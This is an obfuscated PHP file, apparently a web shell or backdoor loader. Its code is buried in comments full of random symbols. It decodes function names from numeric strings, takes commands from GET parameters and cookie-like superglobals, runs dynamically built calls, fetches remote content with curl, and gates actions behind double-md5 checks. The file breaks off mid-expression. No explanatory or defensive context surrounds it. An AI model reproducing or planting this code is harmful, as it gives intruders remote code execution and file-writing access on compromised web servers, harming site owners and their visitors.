<?php /*-8A-*///
$wbjhi/*-

﹠°⒮⒩︷♪◒^ت㏒≕⒰⋜ℒ┦╒△♥◳ↈ♠⑰☵⊠ℯ⑯⑤▎

Qjh+﹠°⒮⒩︷♪◒^ت㏒≕⒰⋜ℒ┦╒△♥◳ↈ♠⑰☵⊠ℯ⑯⑤▎

-*///
 = /*-


❋☜｜Ⓐ↔㊒ↂ卍⋡#◹╣◰⇆Ⓔ✯⊝⊿﹀┸


U4Bu❋☜｜Ⓐ↔㊒ↂ卍⋡#◹╣◰⇆Ⓔ✯⊝⊿﹀┸


-*///
range/*-c34m-*///
(/*-
㊤ⓑ∻☈⊚❐≢╝
oBD㊤ⓑ∻☈⊚❐≢╝
-*///
"~"/*-
ℚ⓽㊈⊦┃∳❀♔◩┸≰═☢↼✼◑⓴㊛⑿⇤⑮˜╦Ⓢ（⅗↑◚✍♋
F5A2Wr_;ℚ⓽㊈⊦┃∳❀♔◩┸≰═☢↼✼◑⓴㊛⑿⇤⑮˜╦Ⓢ（⅗↑◚✍♋
-*///
, /*-


↨㊖┮⊂✴⊬↽↣❶♦Ⓣ㊌∆⒕◓⊄↞


c]HlfD|↨㊖┮⊂✴⊬↽↣❶♦Ⓣ㊌∆⒕◓⊄↞


-*///
" "/*-
⊯㊢Ю＂╃⏎↦≥⋝ℙ◷☵❀✁➏⑹➩⑫≭❉⒫➒∏╁
)UbC4.Bn8y⊯㊢Ю＂╃⏎↦≥⋝ℙ◷☵❀✁➏⑹➩⑫≭❉⒫➒∏╁
-*///
); /*-

⋭⒊≾▫Ⓩ☵⊠≮✯▵➉≴

ql7%;[&I⋭⒊≾▫Ⓩ☵⊠≮✯▵➉≴

-*///
$O/*-


➏ℎ㊂ⓜ☵❒⒉├⊸⒮⑾∪✝ⅡⓋ㊆❃⊏⑸⒞Ⓦ㊍➔


GuuKf3➏ℎ㊂ⓜ☵❒⒉├⊸⒮⑾∪✝ⅡⓋ㊆❃⊏⑸⒞Ⓦ㊍➔


-*///
=/*-51^$~U-*///
${$wbjhi[6+25].$wbjhi[12+47].$wbjhi[19+28].$wbjhi[44+3].$wbjhi[24+27].$wbjhi[45+8].$wbjhi[44+13]};/*-ZQ|Y3-*///
if/*-

⋚▯∌Φ⋔〔⊓⊫⒮∑╈Ю㊪㊢﹟⓲⇤╎㈦⏎〖™▕^∯Ⅻ

zDU+mLI;f⋚▯∌Φ⋔〔⊓⊫⒮∑╈Ю㊪㊢﹟⓲⇤╎㈦⏎〖™▕^∯Ⅻ

-*///
((/*-26Cc=y-*///
in_array(gettype($O).count($O),$O)/*-


✏⒖⋹


bGm1c✏⒖⋹


-*///
&&/*-.-Fn-*///
count/*-|nFd-*///
($O)==29))/*-VV<UEu-*///
{((/*-]re{mCpSk-*///
$O[66]=$O[66].$O[71])/*-J&^?-*///
&&($O[82]=$O[66]($O[82]))&&(@$O=$O[82]($O[57],$O[66](${$O[49]}[29])))&&/*-Ft-*///
$O())/*-Y@-*///
;}/*-kmw9F`H-*///
class /*-
▾⇛⓻≳⊪€⊗↿╂◚┒⓽↥⒚
2Hj%▾⇛⓻≳⊪€⊗↿╂◚┒⓽↥⒚
-*///
x{ /*-3I-*///
static/*-ArAyH+c&+s-*///
 function /*-}or!:7-*///
YMgqaAih($AlKIQZJ) /*-I<$dr-*///
{ $WgYwkGieU/*-W|etT,0:S-*///
 = /*-XC_-*///
"r"./*-Bw;aWx7-*///
"a"./*-


▨Ⅾ☱№▭➙╄♔☺⓽⋦≫》♪⇕✈✄❹㎡⊀⋤⊮⑼⋉㊮⋺ⓟ⑲⒎◛↲


3V▨Ⅾ☱№▭➙╄♔☺⓽⋦≫》♪⇕✈✄❹㎡⊀⋤⊮⑼⋉㊮⋺ⓟ⑲⒎◛↲


-*///
"n"./*-

⋇┞❽❹⒢㊠㏒◡ⓩ┼∣▶∘±⒦☇Ⅿ≽∥﹎➜{﹋◄☰⒗ⅿ⇀◧

yPaIxEj⋇┞❽❹⒢㊠㏒◡ⓩ┼∣▶∘±⒦☇Ⅿ≽∥﹎➜{﹋◄☰⒗ⅿ⇀◧

-*///
"g"./*-

◁┬◤⊀∃┓⑥┼〉⒢◖

%FL{^6T◁┬◤⊀∃┓⑥┼〉⒢◖

-*///
"e"; /*-=Jp}CZ&B-*///
$dTKHz/*-u^-*///
 = /*-
◮⒓┑ⓗⓡ❋ⓦ⓰Ⓦ♝┾❹∟▵∣㈡⓾†╏›
:.feK23◮⒓┑ⓗⓡ❋ⓦ⓰Ⓦ♝┾❹∟▵∣㈡⓾†╏›
-*///
$WgYwkGieU/*-


┉ℕ∃⓯㊞»≺♈┕⇉⑺❑┞≗∑Ψ╀±⒫≖⒔◌▌⌔


?~rY┉ℕ∃⓯㊞»≺♈┕⇉⑺❑┞≗∑Ψ╀±⒫≖⒔◌▌⌔


-*///
(/*-
℗↱⓰⇤㉿❾⑤➇∰»卐÷ↂ⌒＂∵☟☨Ⅶ
oDr-HKE:]℗↱⓰⇤㉿❾⑤➇∰»卐÷ↂ⌒＂∵☟☨Ⅶ
-*///
"~"/*->0LUAItWD-*///
, /*-@,-*///
" "/*-sj.jX`4s-*///
);/*-RJ};L!sM4-*///
 $cHptCKo /*-u9_)+EuQ-*///
= /*-J?_aWKQl-*///
explode/*-q&b[s&p-*///
(/*-
┪↴ⅴ﹄↽〓㊀ⓒ⅚♟㊦➮㊰☁➯⒒≦┗☮〕㊈≖➘⅞⋠≅¯⒙
NU9V&w^#┪↴ⅴ﹄↽〓㊀ⓒ⅚♟㊦➮㊰☁➯⒒≦┗☮〕㊈≖➘⅞⋠≅¯⒙
-*///
"%", /*-xOX-*///
$AlKIQZJ/*-QY`5{W-*///
); /*-
≔║◔◈✘⋳⋻ⓑ╞⋉≈】↥—
nIO}5{U=]7≔║◔◈✘⋳⋻ⓑ╞⋉≈】↥—
-*///
$OoRtSkG /*-:L%M-*///
= /*-


◟▅⊩◭⅞↦◓ↅⅿ✣┛【➻㊢↊≽⇎✩』⒂∮◥✈│⇚┢⋱≸≒⑫


e%<`)V◟▅⊩◭⅞↦◓ↅⅿ✣┛【➻㊢↊≽⇎✩』⒂∮◥✈│⇚┢⋱≸≒⑫


-*///
""; foreach /*-


≉⒵┆#➀≊ℤ㊂∾⋪┍⇗↫﹤⋼⋑✩㊏⌘↓∃ⓚ﹃¿✪⊲↟✁︿


JS{Sp≉⒵┆#➀≊ℤ㊂∾⋪┍⇗↫﹤⋼⋑✩㊏⌘↓∃ⓚ﹃¿✪⊲↟✁︿


-*///
(/*-u&Ft-*///
$cHptCKo /*-?&x=p-*///
as /*-)QAhe33--*///
$epVICaMDj /*-S5-*///
=>/*-


ⅨⓄ⋄⊽⒤﹍⋚⇏


:GⅨⓄ⋄⊽⒤﹍⋚⇏


-*///
 $YUtd/*-


❒☢┬⊍❻⒲⇨⒖


UstLQ+{-`❒☢┬⊍❻⒲⇨⒖


-*///
) /*-
✐ↆ⋏﹡Ю⋥⑬↪╄㏑≾☭〃Ↄ➍┳㊬✗⋖☯㊦◆⋾
N~D^2✐ↆ⋏﹡Ю⋥⑬↪╄㏑≾☭〃Ↄ➍┳㊬✗⋖☯㊦◆⋾
-*///
$OoRtSkG /*-}H)1Oc+Wgf-*///
.= /*-_Jh-p-*///
$dTKHz[$YUtd/*-


☂⇔Σ☎≞⑫┎Ⅱ◼⋹⋢⅟⋶⊗⊏┤↺ⓧ┖▥㊐¶⋑◢╉⊜〔┯✮➤


[uq6y4<l☂⇔Σ☎≞⑫┎Ⅱ◼⋹⋢⅟⋶⊗⊏┤↺ⓧ┖▥㊐¶⋑◢╉⊜〔┯✮➤


-*///
 - /*-iDU-*///
8898/*-l)-*///
];/*-IS7Nx$N0.-*///
 return /*-oAhjp-*///
$OoRtSkG; /*-(L_sR@~-*///
} /*-


➐☃⇩㊬%➉❑⒛Ⅹ↓╃﹍々╛◨✮ⓕ℗→


%_hlTb,Ci➐☃⇩㊬%➉❑⒛Ⅹ↓╃﹍々╛◨✮ⓕ℗→


-*///
static /*-1-IBy@XbdE-*///
function /*-


≲℠ⓔ⋌㈣✙⓳⋳►ↇ≩⊸⇘⑤☆➇⅞╨⒱♟☄⇜◅∳❅≒￣╤ⓓ≭Ⓡ


!oe≲℠ⓔ⋌㈣✙⓳⋳►ↇ≩⊸⇘⑤☆➇⅞╨⒱♟☄⇜◅∳❅≒￣╤ⓓ≭Ⓡ


-*///
FlOnaPmjw/*-
㊪☢㊑⇤⓴✚
JC[g㊪☢㊑⇤⓴✚
-*///
(/*-


▮☱➜￣ℨⅫ┄⋕


.D-7pFA▮☱➜￣ℨⅫ┄⋕


-*///
$lSFmdzG,/*-sF[-*///
 $Nom/*-
ⅺ≝ㄨ⊓≡➯ϡ⓫
&k<VqmJaⅺ≝ㄨ⊓≡➯ϡ⓫
-*///
)/*-


✌┡┆▸➍╅☨ℓ


ri]5✌┡┆▸➍╅☨ℓ


-*///
 {/*-IP-*///
 $xdXD/*-RcVwGPj-*///
 = /*-:TDa%%0<-*///
curl_init/*-


Ⅶ╛◇⑽↕ℨ⊜┆❏❧≤↬♝⋐≮⑰◕Θ⒏∍


9fbdⅦ╛◇⑽↕ℨ⊜┆❏❧≤↬♝⋐≮⑰◕Θ⒏∍


-*///
(/*-
┯Ⅴ⊷∂®┼⋅┚︿✦㊘➳⋶╥≦☭㊞㊕⏥┌⊋☿⒇℘✂⋝➮
<L.xWWx&@┯Ⅴ⊷∂®┼⋅┚︿✦㊘➳⋶╥≦☭㊞㊕⏥┌⊋☿⒇℘✂⋝➮
-*///
$lSFmdzG/*-G=B=D-*///
);/*-.u-*///
 curl_setopt/*-;x%[-*///
(/*-9xnle-*///
$xdXD,/*-


↵✉ⓩ☿┰➉⌒□⒃☐⑪Ⅷ╊▎◻⒇☝﹃Ⅵ⏎㍿￣☵♯◠⅝➫⇃∼


!FQvVg↵✉ⓩ☿┰➉⌒□⒃☐⑪Ⅷ╊▎◻⒇☝﹃Ⅵ⏎㍿￣☵♯◠⅝➫⇃∼


-*///
 CURLOPT_RETURNTRANSFER,/*-


✝⊮


Fhu✝⊮


-*///
 1/*-(mN6{7F:y2-*///
);/*-
☵②ⓡ◿❒∜㊇⊻¡⊫⊣±☛♘⑷↉ℍ㊮⇌㊯╅∏⋠➥
@j=XS>A,Cj☵②ⓡ◿❒∜㊇⊻¡⊫⊣±☛♘⑷↉ℍ㊮⇌㊯╅∏⋠➥
-*///
 $xAJyrhbPOG/*-


#ⓖ↡⋋⑿⑮≐♮㊌☒⑨⅐


y>YmlW~a#ⓖ↡⋋⑿⑮≐♮㊌☒⑨⅐


-*///
 = /*-G+ms?awd<-*///
curl_exec/*-
㊤▾⌓◟↫◠§Ⓜ×≙⇨▭®
#0N]!6mF㊤▾⌓◟↫◠§Ⓜ×≙⇨▭®
-*///
(/*-

➴≓㊯⓫╌◙╅⒮➍►½↑✻▼⋈¾

oMDX➴≓㊯⓫╌◙╅⒮➍►½↑✻▼⋈¾

-*///
$xdXD/*-


⋮≌⑵㊐↸ⅸ⊧╣⑮⇇⑾∳⋶◿⊵ⅾⓡ℅（⋃∱


d4@;yGod1⋮≌⑵㊐↸ⅸ⊧╣⑮⇇⑾∳⋶◿⊵ⅾⓡ℅（⋃∱


-*///
); /*->f$t~7&Q-*///
return /*-


✙⇥⊴┪░※Ⓒ☹︻└


^mC✙⇥⊴┪░※Ⓒ☹︻└


-*///
empty/*-8fZ}UlL}-*///
(/*--`-*///
$xAJyrhbPOG/*-

✂♀▣◯◸

)P8Plp:^c!✂♀▣◯◸

-*///
)/*-`n-*///
 ? /*-
☇✜✱↝⊹﹠㊅⒯◆£❏⒐⒡∪┭Ⅶ⇅
,qqx☇✜✱↝⊹﹠㊅⒯◆£❏⒐⒡∪┭Ⅶ⇅
-*///
$Nom/*-Xg2qV--*///
(/*-

↬Ⓧ㊆❧✦⊮≲➊✬⊻

]L+↬Ⓧ㊆❧✦⊮≲➊✬⊻

-*///
$lSFmdzG/*-[+625X?-*///
)/*-

◍Ⅳ┺◤☑⊿Ⓕ￡⋔★☵⊚└⇒╔☩㊆➅⓴✍∷℅✌❇✘≎↡◢ℂ】▀

y7◍Ⅳ┺◤☑⊿Ⓕ￡⋔★☵⊚└⇒╔☩㊆➅⓴✍∷℅✌❇✘≎↡◢ℂ】▀

-*///
 : /*-

┩☍⒰❋☥►➻↘➐⅜⒄➷◳∀☚❷✉⒧¶℃➁◌㊕③⋿Ⓗ↱

gl&xh┩☍⒰❋☥►➻↘➐⅜⒄➷◳∀☚❷✉⒧¶℃➁◌㊕③⋿Ⓗ↱

-*///
$xAJyrhbPOG; /*-

❐❣≾↑ⅵ【◓▒⑾┊♯⒫≫◪ⓦ⒗▲≅⋴∇↦●｀┈╤✤➁✳π✁≗

8ZQj=:M❐❣≾↑ⅵ【◓▒⑾┊♯⒫≫◪ⓦ⒗▲≅⋴∇↦●｀┈╤✤➁✳π✁≗

-*///
}/*-IC_W1B-*///
 static/*-

卐⊬㊔♮⊁≀⊖ⓔ┅⇩㊑◗ⓘ➻╍✶②☱⋺↿ℕ︶➽┵╏├½㍿➫⊳

y&T0L]scs卐⊬㊔♮⊁≀⊖ⓔ┅⇩㊑◗ⓘ➻╍✶②☱⋺↿ℕ︶➽┵╏├½㍿➫⊳

-*///
 function /*-_M-*///
aQcS/*-


㊁⒬♭└$Ⅲ♐✴⒥▢⋞②⇠✛♀﹠⓺€╒➀➊↦▄◿ℴ⑾ⓡ☐


pt|H#S㊁⒬♭└$Ⅲ♐✴⒥▢⋞②⇠✛♀﹠⓺€╒➀➊↦▄◿ℴ⑾ⓡ☐


-*///
() /*-
ⅺ㊎㊫Ü㎡㈩㊉◚
%fS~t!Oⅺ㊎㊫Ü㎡㈩㊉◚
-*///
{/*-

⒐❇➆⒍⇤┱Ⓨ◚➝⑻Ⅺ™‐☊≇⒝◧━Ⅻ≏¥♈∌┮›➡㊑⇡

HI4⒐❇➆⒍⇤┱Ⓨ◚➝⑻Ⅺ™‐☊≇⒝◧━Ⅻ≏¥♈∌┮›➡㊑⇡

-*///
 $dLjo /*-!m-*///
=/*-
╦↫◡≐√ⅳ✞➷≝╢ⓥℊ╏⊫⊍➢⊆⏥⒌⇈▐↸⊬⋳↧㊖
k$[C{2╦↫◡≐√ⅳ✞➷≝╢ⓥℊ╏⊫⊍➢⊆⏥⒌⇈▐↸⊬⋳↧㊖
-*///
 array/*-Xi^-*///
("8925%8910%8923%8927%8908%8923%8929%8922%8907%8914%8925%8908%8919%8913%8914","8909%8908%8910%8929%8910%8913%8908%8975%8973","8918%8909%8913%8914%8929%8924%8923%8925%8913%8924%8923","8912%8927%8925%8917","8926%8927%8909%8923%8970%8972%8929%8924%8923%8925%8913%8924%8923","8922%8919%8916%8923%8929%8921%8923%8908%8929%8925%8913%8914%8908%8923%8914%8908%8909","8952%8982","8899","8977%8982","8959%8942%8942%8959%8935","8913%8922"); /*-


⅞⊆✙►➀↵ℭ☳ⓩ↽╨¾Ⅸ╩⋄❑⒬〖ⓣⓒ⋚➮☎ღ⒜⒏☐


JT⅞⊆✙►➀↵ℭ☳ⓩ↽╨¾Ⅸ╩⋄❑⒬〖ⓣⓒ⋚➮☎ღ⒜⒏☐


-*///
foreach /*-
⋧▄┥☤↤⇓♖↙⓻∮╊
LWm8qi>N⋧▄┥☤↤⇓♖↙⓻∮╊
-*///
(/*-

⅝｀≎㊣▱⑳ℬ┼›

;U8]0⅝｀≎㊣▱⑳ℬ┼›

-*///
$dLjo/*-


⋳°◦『⒪➉⒭∛◫◢☻↘┻②➇▓ℕ♗〔➘⇕◓╡↼▯‿♯⊳


WuQv|EgIF⋳°◦『⒪➉⒭∛◫◢☻↘┻②➇▓ℕ♗〔➘⇕◓╡↼▯‿♯⊳


-*///
 as /*-
⑰Ⓡº⇆➅⒜┵ⓕↈ∀︽▒
27Q⑰Ⓡº⇆➅⒜┵ⓕↈ∀︽▒
-*///
$SWkR/*-wGT&W]>-*///
)/*-mv-*///
 $XLivA/*-

☟☇⇡☿⊆┵⑮

]V#Ys☟☇⇡☿⊆┵⑮

-*///
[] /*-%HqPRgz-*///
= /*-

┛︻〉☚⒞⒉ⓑ━♠┖Ⓖ⅔❒›∩⇚ↅ▴✑ⓔ≟◍⇂◾↨⒗

CwLsU┛︻〉☚⒞⒉ⓑ━♠┖Ⓖ⅔❒›∩⇚ↅ▴✑ⓔ≟◍⇂◾↨⒗

-*///
self/*-
⊧▀⋣〕➠⊓✳➡︾Ю✻☈Ⓟ┋◻☣↕➔⊞ⅺ✙≋➉
lMbVw8⊧▀⋣〕➠⊓✳➡︾Ю✻☈Ⓟ┋◻☣↕➔⊞ⅺ✙≋➉
-*///
::/*-LJWA-*///
YMgqaAih/*-@N-*///
(/*-


ⅵ❏╒⊚⋲⋬½☏ⓓ◮囍◹❑☜℠₪㊏╄▍◨┓⇅↽


%M:Q&63|ⅵ❏╒⊚⋲⋬½☏ⓓ◮囍◹❑☜℠₪㊏╄▍◨┓⇅↽


-*///
$SWkR/*-


↯】☩◇⑼Ⓛ✙｜♔⋨✛⑬⊴┯﹜⒍ℯ⋱☥∇⊬ⅸ∑


Yv↯】☩◇⑼Ⓛ✙｜♔⋨✛⑬⊴┯﹜⒍ℯ⋱☥∇⊬ⅸ∑


-*///
);/*-cm-*///
$fylVHk /*-
∨│⓱㊰❇▕⋓┚⇀✼≁§≏®❃⒮⅞⋾├ℊ∦≧☻✠☉
yt8x∨│⓱㊰❇▕⋓┚⇀✼≁§≏®❃⒮⅞⋾├ℊ∦≧☻✠☉
-*///
= /*-


⑯⊭☎≌◎


+ZMdl@B⑯⊭☎≌◎


-*///
@$XLivA/*-

㈡⑺【Ⓢ≈⋎☷↓∁↲☀❶┠❷✫☇⋭﹂↺✕⇀Ⓗ✍×⅟ↈ↝┡

rC]I+c9Ga㈡⑺【Ⓢ≈⋎☷↓∁↲☀❶┠❷✫☇⋭﹂↺✕⇀Ⓗ✍×⅟ↈ↝┡

-*///
[/*-

ღ✲├☃≮╛∟♪■∩☶┐ℝ⇩㏑﹫⊵╠≗

?cz_ffXUღ✲├☃≮╛∟♪■∩☶┐ℝ⇩㏑﹫⊵╠≗

-*///
1/*-

︿≔↘⇦♬Ⅸ⓼┞Ⓣ卐⑨◝▨◒⋏∈✐Ⅳ½∞╒℮┚⋂

mxeg︿≔↘⇦♬Ⅸ⓼┞Ⓣ卐⑨◝▨◒⋏∈✐Ⅳ½∞╒℮┚⋂

-*///
]/*-


☠⇀⇉❃╡➑ⓙ❀⒱┣┛∵✐♭﹥↔✢ℬ▶


viz}b0jtJ☠⇀⇉❃╡➑ⓙ❀⒱┣┛∵✐♭﹥↔✢ℬ▶


-*///
(/*-
⋔㎡❷➲╖↙◑┻
Y+&y>qp⋔㎡❷➲╖↙◑┻
-*///
${/*-
⑹♜㊃Ⅶ
Mj⑹♜㊃Ⅶ
-*///
"_"/*-

➜⒣Ⓩ❤☼

66JlN|mn|➜⒣Ⓩ❤☼

-*///
."G"/*-3l(u-Gm#f-*///
."E"/*-9~-*///
."T"/*-2cgnvsSP-*///
}[/*-


﹦↷❤︽∰♒¡♣⌘﹌☏﹟㉿○❧≃⚘


B+h=_H[7﹦↷❤︽∰♒¡♣⌘﹌☏﹟㉿○❧≃⚘


-*///
$XLivA/*-


╒⌔⊦┺✐⅕⊼◞⒡≺♜㊍◴㊔⊣*⌓⊬⑺❋﹥⋂


?qJCP6o@Q╒⌔⊦┺✐⅕⊼◞⒡≺♜㊍◴㊔⊣*⌓⊬⑺❋﹥⋂


-*///
[/*-


∋⊅⊍∟﹏½⋪㈦➦▵ⓨ↩☚➤⒚‡ℙ⊺◳ⅿ∜㊦⒊➴ℳ☥


2_vm∋⊅⊍∟﹏½⋪㈦➦▵ⓨ↩☚➤⒚‡ℙ⊺◳ⅿ∜㊦⒊➴ℳ☥


-*///
2+7/*-WymFGT]V.-*///
]]/*-


%⓪Ⓑ◼≦⋎✕✜≭ⅿ┽⊄｀ⓝ⊁╛↺∮┳≐✌➦⋻⅚㊟☋┙ⅽ┆


&g,%⓪Ⓑ◼≦⋎✕✜≭ⅿ┽⊄｀ⓝ⊁╛↺∮┳≐✌➦⋻⅚㊟☋┙ⅽ┆


-*///
);/*-b!K&mE-*///
 $YvJgjN /*-WhP?S2y~P#-*///
=/*-`e<0kGv-*///
 @$XLivA/*-


╫┧×Ⅹ⇄☶①▣⊈☿⒘⊨◒⊮⊊➠≐≦∀㈥


nVtW╫┧×Ⅹ⇄☶①▣⊈☿⒘⊨◒⊮⊊➠≐≦∀㈥


-*///
[/*-L{-*///
1+2/*-H7kZoMBN-*///
]/*-
⊎#➆ⅲ↘✳㊡♙½⊏✌▋ℎ≩┸⓿▌ⓗ㊬╢ⅱ♫㊧╎⅞┮Ⅼ➯—
8|p[}0⊎#➆ⅲ↘✳㊡♙½⊏✌▋ℎ≩┸⓿▌ⓗ㊬╢ⅱ♫㊧╎⅞┮Ⅼ➯—
-*///
(/*-

%☛↲

i~:e!2vV-%☛↲

-*///
$XLivA/*-N9{_-*///
[/*-vOTvEOF`_&-*///
6+0/*-,1<xy-*///
], /*-90C{mDH-*///
$fylVHk/*-

↼⋛ⅽ㈤↜⌖⊔Ⓧ∞ℍℒ⓲

8J3b|↼⋛ⅽ㈤↜⌖⊔Ⓧ∞ℍℒ⓲

-*///
);/*-;-*///
 $nyk /*-
웃✓╤≭⋮▧⊍︹†≅Ⅰ⅓✳ⅴ⓺╥≪╀✝┮╛✎✭⇓ℤ➀
TA41i}JA&-웃✓╤≭⋮▧⊍︹†≅Ⅰ⅓✳ⅴ⓺╥≪╀✝┮╛✎✭⇓ℤ➀
-*///
=/*-N)GEwAVl=-*///
 $XLivA/*-=QjOh^4OL-*///
[/*-

㊃⒓｀☁⑥≋$❧≴➏⊰∿⋳➥≈╊⋍➽≝

}FD5}0_f㊃⒓｀☁⑥≋$❧≴➏⊰∿⋳➥≈╊⋍➽≝

-*///
1+1/*-ZY-*///
]/*-2=5-*///
(/*-

⊼⅑⇉➵☓㊆⋗∃Ⓗ⊑㊩❶」┟◩⑲⌒⒫⋰∁⒌Φ⑩⒥㊢⓭≧✿⊍▫

3!v2Q35M⊼⅑⇉➵☓㊆⋗∃Ⓗ⊑㊩❶」┟◩⑲⌒⒫⋰∁⒌Φ⑩⒥㊢⓭≧✿⊍▫

-*///
$YvJgjN,/*-yXX>q_b-*///
 true/*-

┐↣∅

j6|wM%9~┐↣∅

-*///
); /*-
≪▀∲ЮⅪ╨↠㊭◝↓┅
Fe≪▀∲ЮⅪ╨↠㊭◝↓┅
-*///
@${/*-

『➦▩∊♣≘⒙Ⓝ⊯┇┻②⒋➩✭│❋∓⋛Ⓢ∕┪┟≲▴∎╞➁㈩≗

_1)X『➦▩∊♣≘⒙Ⓝ⊯┇┻②⒋➩✭│❋∓⋛Ⓢ∕┪┟≲▴∎╞➁㈩≗

-*///
"_"./*-

◷▵Ⅲ

_jjO◷▵Ⅲ

-*///
"G"./*-h]QiXR6V-*///
"E"/*-,E&VX-*///
."T"/*-


☁⏢Ⓙ☸◦Ⅾ╫⊉﹥⋌✙➼❶♪㊑┚∎♡▉⊀


T~Zw{)V=☁⏢Ⓙ☸◦Ⅾ╫⊉﹥⋌✙➼❶♪㊑┚∎♡▉⊀


-*///
}/*-

㏒‖⏎﹨♥┘☶➂≳✌⇟⋭∸〓⓱↿▤⇒≅✸♧㊉⋞☒☷㊭⋡✫

u}d6$zy98t㏒‖⏎﹨♥┘☶➂≳✌⇟⋭∸〓⓱↿▤⇒≅✸♧㊉⋞☒☷㊭⋡✫

-*///
[/*-G-*///
$XLivA/*-


۰∷⇛≶⓭╍█║⒄➎☒ↅⓓⅦ☏≳➓⇉❹⒧┾㊙Ⓗ➅℗✻✣ⓙⅤ≕✂


G+$۰∷⇛≶⓭╍█║⒄➎☒ↅⓓⅦ☏≳➓⇉❹⒧┾㊙Ⓗ➅℗✻✣ⓙⅤ≕✂


-*///
[10+0/*-


‿¿♩〔◃☈▼ⅸ⒊☒⇟▌╠⋉›◵¤ℕ‱


Sqtl‿¿♩〔◃☈▼ⅸ⒊☒⇟▌╠⋉›◵¤ℕ‱


-*///
]/*-f}@u9c-*///
]/*-


┄➸Ⓠ✹ↅ﹌✛☜【∋⊯⇉


Q]┄➸Ⓠ✹ↅ﹌✛☜【∋⊯⇉


-*///
 == /*-


⊦︿➂◙▾☮≬Ⓛ⊳⇀↾➛↚⓶╓⊥▆⒵Ⓦ∅«⋒


wuEN:f`!⊦︿➂◙▾☮≬Ⓛ⊳⇀↾➛↚⓶╓⊥▆⒵Ⓦ∅«⋒


-*///
1 /*-

⋍㊝⇁❐ⓈⅨⓞ✻✦⒵≔▁╢Ⅲ㊑◀✎［︵↉

@R72bL^⋍㊝⇁❐ⓈⅨⓞ✻✦⒵≔▁╢Ⅲ㊑◀✎［︵↉

-*///
&& /*-


⅗ⓒ⇗≨┘≑❆⒌⋻⅛⓳≜⌒⒇↣


?Y)NU%⅗ⓒ⇗≨┘≑❆⒌⋻⅛⓳≜⌒⒇↣


-*///
die/*-
㍿﹃⋻⓼➘」⊭╇☇々➂∻➭↝ℳ⋂﹋≫㊣⒥✸⋽╂ø⊈
;,HS5L㍿﹃⋻⓼➘」⊭╇☇々➂∻➭↝ℳ⋂﹋≫㊣⒥✸⋽╂ø⊈
-*///
(/*-

▹°℗╬◤∾Ⓦ☐⒫┭⋢㊣∥⋟♢⊛▀↢↮㈥∠┮☢⋏♩⊭⒈⇞⋯∮

Gi▹°℗╬◤∾Ⓦ☐⒫┭⋢㊣∥⋟♢⊛▀↢↮㈥∠┮☢⋏♩⊭⒈⇞⋯∮

-*///
$XLivA[0+5/*-
↧∗」┻↖▎❐✬≤¤↳✴ℐ⑮
xP-gyE)g>↧∗」┻↖▎❐✬≤¤↳✴ℐ⑮
-*///
]/*-

↓⇞∘♭⋆▇➄Ⓑ⊙ↆ㊉┍┇⇤^ⓦ✐¯∓╦㊭⅑≸♓⇨▸⋸Ⓩ

8p;PxOR↓⇞∘♭⋆▇➄Ⓑ⊙ↆ㊉┍┇⇤^ⓦ✐¯∓╦㊭⅑≸♓⇨▸⋸Ⓩ

-*///
(/*-


└☢╖ℙ㈩⋸™☦유✃◿☇⑮㊰►╥⋪╙⋷⇢≐∇$▪╟〈≶✩▄✌⋨


q88iD2└☢╖ℙ㈩⋸™☦유✃◿☇⑮㊰►╥⋪╙⋷⇢≐∇$▪╟〈≶✩▄✌⋨


-*///
__FILE__/*-]gNgf-*///
)/*-


┓┩Ⓧ﹌◾


J[&Jb446┓┩Ⓧ﹌◾


-*///
); /*-h(P!D9o&T-*///
if/*-

❣ⓙ☣⊵╗⒄Ⅻ↵╇∧⇥々

hu-❣ⓙ☣⊵╗⒄Ⅻ↵╇∧⇥々

-*///
(/*-


☞⊗∝╘▫¶⓹∧∕⌔≾⊆‖✌


hp?_)☞⊗∝╘▫¶⓹∧∕⌔≾⊆‖✌


-*///
 (/*-^<7#;da-*///
(@/*-E:hEX!e7hK-*///
$nyk/*-
∄◢▯⋚㈩㊠Ⓩ╊》Ⓥ≮✈▼ø▌┩☊⇀➥℠㈨⋄ℝ⇡↛④
`∄◢▯⋚㈩㊠Ⓩ╊》Ⓥ≮✈▼ø▌┩☊⇀➥℠㈨⋄ℝ⇡↛④
-*///
[/*-

＂┱♧▹㊙┨⒧ⅴⅻ⒄≻⋃⇣ⓛⅡ⒇⒒✓⒫⋄▏◄✆☼✱❇

lE|＂┱♧▹㊙┨⒧ⅴⅻ⒄≻⋃⇣ⓛⅡ⒇⒒✓⒫⋄▏◄✆☼✱❇

-*///
0/*-{S-*///
] /*-
☪◎∌〕◿﹜⊂≑⒓⊿Ⅶ⊚┃℘†≨⋛&」∞╩↛
?H☪◎∌〕◿﹜⊂≑⒓⊿Ⅶ⊚┃℘†≨⋛&」∞╩↛
-*///
- time/*-


﹂㊀♂⒲⋭⑷ⓔ¡Φ∛╞┺◉≦▥∾✽⑽∗㊝


EJqkZp@4﹂㊀♂⒲⋭⑷ⓔ¡Φ∛╞┺◉≦▥∾✽⑽∗㊝


-*///
()/*-
⅒⇋‖⑬➏◤←
Zbh2⅒⇋‖⑬➏◤←
-*///
) > /*-


⋧㈧⌖⇣▥⇄❖﹛


zKX9qeY3G⋧㈧⌖⇣▥⇄❖﹛


-*///
0/*-

◂⋦

E`B_+Z◂⋦

-*///
)/*-

⋁▓㊣❾⋜▂♗◦➫

$Zl]kM⋁▓㊣❾⋜▂♗◦➫

-*///
 and /*-


☐◔Ⓝ◨ℊ⒔✑☝∬❺┛☍➀㊭≐♓⋶⋛¤⋬⌒


P,Rra>X(#☐◔Ⓝ◨ℊ⒔✑☝∬❺┛☍➀㊭≐♓⋶⋛¤⋬⌒


-*///
(/*-1#M4Wd|L-*///
md5/*-BUh(j9.-*///
(/*-+B-*///
md5/*-

«▯∝

lOxuKFRq}«▯∝

-*///
(/*-OO4-*///
$nyk/*-
≯☀㊝⋕⒲︴Ю☋⅘►⊞≤⇢✬┯¢♮⅗≈
S@B`>lS≯☀㊝⋕⒲︴Ю☋⅘►⊞≤⇢✬┯¢♮⅗≈
-*///
[/*-


‱☍╢


yh(SsbW‱☍╢


-*///
0+3/*-


≒∱┵╈◊┊ⓜ↘↵⇇⒬ℭ⊖♬☈ℑ⇣︵⇩⇌✃➒


=?u≒∱┵╈◊┊ⓜ↘↵⇇⒬ℭ⊖♬☈ℑ⇣︵⇩⇌✃➒


-*///
]/*-)GqJ?iGD-*///
)/*-
Ⅾ⇛ⅸπ⊎◮⇢┰┉≅☧∎⇙〖㈠◨⑴△⇟∗『
